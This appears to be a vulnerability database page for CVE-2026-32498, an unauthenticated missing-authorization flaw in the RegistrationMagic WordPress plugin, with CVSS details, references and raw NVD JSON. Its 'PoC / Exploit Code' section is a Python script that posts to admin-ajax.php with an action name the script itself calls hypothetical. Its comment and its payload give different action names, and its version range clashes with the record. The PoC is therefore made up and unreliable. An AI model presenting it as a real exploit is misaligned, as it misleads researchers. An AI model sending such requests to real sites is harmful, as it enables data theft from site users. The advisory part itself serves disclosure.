CVE-2026-32498

Description

Missing Authorization vulnerability in Metagauss RegistrationMagic custom-registration-form-builder-with-submission-manager allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects RegistrationMagic: from n/a through <= 6.0.7.6.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Metagauss RegistrationMagic <= 6.0.7.6

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Exploit Title: RegistrationMagic < 6.0.7.6 - Missing Authorization
# Date: 2026-03-25
# CVE: CVE-2026-32498

target_url = "http://target-site.com/wp-admin/admin-ajax.php"

# Example payload targeting a vulnerable unauthenticated action
# The specific action name 'rm_data_export' is hypothetical based on common plugin structures
payload = {
    "action": "rm_vulnerable_action", 
    "rm_form_id": "1"
}

try:
    response = requests.post(target_url, data=payload)
    if response.status_code == 200:
        print("[+] Request sent. Check response for sensitive data leakage.")
        print(response.text[:200])
    else:
        print("[-] Target may not be vulnerable or is offline.")
except Exception as e:
    print(f"Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-32498
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-32498
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-32498/
[4] VulDB https://vuldb.com/cve/CVE-2026-32498
[5] https://patchstack.com/database/Wordpress/Plugin/custom-registration-form-builder-with-submission-manager/vulnerability/wordpress-registrationmagic-plugin-6-0-7-6-broken-access-control-vulnerability-2?_s_id=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-32498", "sourceIdentifier": "[email protected]", "published": "2026-03-25T17:17:01.680", "lastModified": "2026-04-24T16:35:20.070", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Metagauss RegistrationMagic custom-registration-form-builder-with-submission-manager allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects RegistrationMagic: from n/a through <= 6.0.7.6."}, {"lang": "es", "value": "Vulnerabilidad de Falta de Autorización en Metagauss RegistrationMagic constructor de formularios de registro personalizados con gestor de envíos permite Explotar Niveles de Seguridad de Control de Acceso Mal Configurados. Este problema afecta a RegistrationMagic: desde n/d hasta <= 6.0.7.6."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/custom-registration-form-builder-with-submission-manager/vulnerability/wordpress-registrationmagic-plugin-6-0-7-6-broken-access-control-vulnerability-2?_s_id=cve", "source": "[email protected]"}]}}